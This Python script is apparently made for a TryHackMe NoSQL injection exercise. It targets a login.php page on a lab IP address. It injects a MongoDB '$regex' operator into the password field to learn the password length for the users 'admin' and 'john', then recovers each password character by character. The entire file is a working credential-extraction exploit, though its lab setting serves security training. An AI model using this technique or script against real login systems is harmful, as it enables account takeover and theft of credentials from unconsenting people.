thm-nosql-injection-tutorial.py

#!/usr/bin/python

import requests
import string

ip = '10.10.241.19'

def try_password(password, username='admin'):
    r = requests.post(f'http://{ip}/login.php', allow_redirects=True, data={'remember': 'on', 'user': username, 'pass[$regex]': password})
    if 'Invalid' in r.text:
        return False
    else:
        return True


alphabet = string.ascii_lowercase + string.ascii_uppercase + string.digits

usernames = ['admin', 'john']

for username in usernames:

    print(f'Username: {username}')

    # Determine Password Length
    length = 0
    while True:
        length += 1
        print(length, end='\r')
        if try_password(r'^.{' + str(length) + r'}$', username):
            break

    print (f'Password Length: {length}')

    # Get Password
    password = ['.' for i in range(length)]
    for i in range(length):
        for char in alphabet:

            password[i] = char
            pw = ''.join(password)
            print(pw, end='\r')
            if try_password(r'^' + pw + r'$', username):
                break
        
    print (f'Password: {"".join(password)}')